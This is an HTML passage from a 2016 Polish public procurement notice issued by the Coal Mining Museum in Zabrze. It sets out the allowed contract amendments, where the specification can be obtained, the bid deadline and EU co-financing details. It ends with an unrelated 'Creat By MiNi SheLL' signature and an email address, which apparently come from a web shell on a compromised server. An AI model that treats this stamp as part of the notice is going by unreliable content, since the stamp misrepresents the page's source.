a) zmiana podwykonawców w tym podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca  wykaże  spełnianie warunków w zakresie nie mniejszym niż wymagane  
w SIWZ; <BR>
b)	wprowadzenie dodatkowego podwykonawcy pod warunkiem uzyskania zgody Zamawiającego 
i spełnienia  warunków w zakresie nie mniejszym niż wymagane w SIWZ; <BR>
c)  zmiany przepisów prawa  istotnych dla  postanowień  zawartej umowy; <BR>
d)	zmiany kluczowego personelu Wykonawcy lub Zamawiającego na skutek zdarzeń losowych, zmian kadrowo-personalnych, utraty wymaganych uprawnień, utraty stanowiska.  Zmiana kluczowego personelu Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej równoważnych, <BR>
e)	wprowadzenie dodatkowego personelu Wykonawcy lub podwykonawcy z przyczyn o obiektywnym charakterze, zaakceptowanych przez Zamawiającego pod warunkiem spełnienia warunków w zakresie nie mniejszym niż wymagane w SIWZ, <BR>
f) wprowadzenie przez Wykonawcę podwykonawcy pomimo deklaracji w ofercie wykonania zamówienia siłami własnymi, <BR>
g)  ustawowa zmiana stawki podatku VAT, której zastosowania nie będzie skutkowało zmianą wartości brutto umowy, <BR>
h)  ograniczenia przedmiotu zamówienia, w szczególności  w przypadku kiedy Zamawiający nie mógł takiej sytuacji przewidzieć, <BR>
i)  poprawa jakości, walorów użytkowych lub innych parametrów charakterystycznych dla danego elementu prac lub zmiana technologii, w szczególności na skutek wystąpienia uwarunkowań technicznych odmiennych od opisanych w dokumentacji technicznej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumgornictwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Górnictwa Węglowego w Zabrzu  
Dział Zamówień Publicznych
ul. Jodłowa 59, 41-800 Zabrze
sekretariat pok. 1.02.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2016 godzina 10:00, miejsce: <BR>Muzeum Górnictwa Węglowego w Zabrzu  
Dział Zamówień Publicznych
ul. Jodłowa 59, 41-800 Zabrze
sekretariat pok. 1.02.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> <BR>Europejski Ośrodek Kultury Technicznej i Turystyki Przemysłowej współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com